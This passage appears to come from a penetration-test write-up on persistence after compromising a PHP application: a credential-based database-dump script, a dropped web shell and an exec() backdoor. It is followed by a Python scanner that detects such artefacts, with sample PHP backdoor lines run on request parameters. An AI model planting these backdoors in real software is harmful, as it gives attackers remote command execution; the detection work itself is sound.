The Rest of the Details
Given that I had full control over the application, the game was basically over. However, it is always good to clean up with a few more tidbits of information. So, I poked around and found a file called db.php, which contained the database connection string with user/pass (see Figure 8). To ensure my continued access, or at least to show I could maintain control, I created a small script that would dump the database using these credentials to a file of my choice. I also left behind a phpterm.php script in a "safe" location to give me quick access to a shell if I needed it later, and added a small backdoor into the index.php script that would allow me to execute commands on the server via the exec() function. With all these "enhancements" in place, I then prepared the report and went to talk with the web developers.
Figure 8: db_php.php details
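As an added defender-side example, not from the original write-up: a small Python scanner that flags the two kinds of artefact described above, a PHP file that is not in the deployment's baseline manifest (the dropped phpterm.php) and an exec-style call fed directly by a request parameter (the index.php backdoor). The sample files and the baseline set are constructed for the example.

```python
import re

# Constructed sample webroot (not files from the original engagement): one page
# with an exec() backdoor on a request parameter, a dropped web shell, two benign files.
SAMPLE_FILES = {
    "index.php": "<?php\nif (isset($_GET['c'])) { echo exec($_GET['c']); }\nrequire 'db.php';\n",
    "db.php": "<?php\n$conn = mysqli_connect('localhost', 'app', 'secret', 'appdb');\n",
    "phpterm.php": "<?php\npassthru($_REQUEST['cmd']);\n",
    "about.php": "<?php\necho 'About us';\n",
}
# Files the deployment is expected to contain (assumed to come from a release manifest).
BASELINE = {"index.php", "db.php", "about.php"}

# PHP functions that pass a string to the OS shell or evaluate it as code.
EXEC_CALL = re.compile(
    r"\b(?:shell_exec|exec|system|passthru|popen|proc_open|eval)\s*\(\s*([^)]*)\)"
)
# Request superglobals; any of these inside an exec-style call means remote command input.
REQUEST_INPUT = re.compile(r"\$_(?:GET|POST|REQUEST|COOKIE)\b")


def find_backdoors(files, baseline):
    """Return {filename: [findings]} for sources that look like dropped or injected backdoors."""
    findings = {}
    for name, src in files.items():
        reasons = []
        if name not in baseline:
            reasons.append("file not in baseline manifest")
        for m in EXEC_CALL.finditer(src):
            call = m.group(0).split("(")[0].strip()
            if REQUEST_INPUT.search(m.group(1)):
                reasons.append(f"{call}() receives request input: {m.group(0).strip()}")
            else:
                reasons.append(f"{call}() call present, review manually")
        if reasons:
            findings[name] = reasons
    return findings


if __name__ == "__main__":
    for name, reasons in find_backdoors(SAMPLE_FILES, BASELINE).items():
        print(name)
        for reason in reasons:
            print("  -", reason)
```

Run against a real webroot, the baseline would be the file list from the last known-good deployment, and any exec-style call outside that baseline or taking request input is worth a manual look.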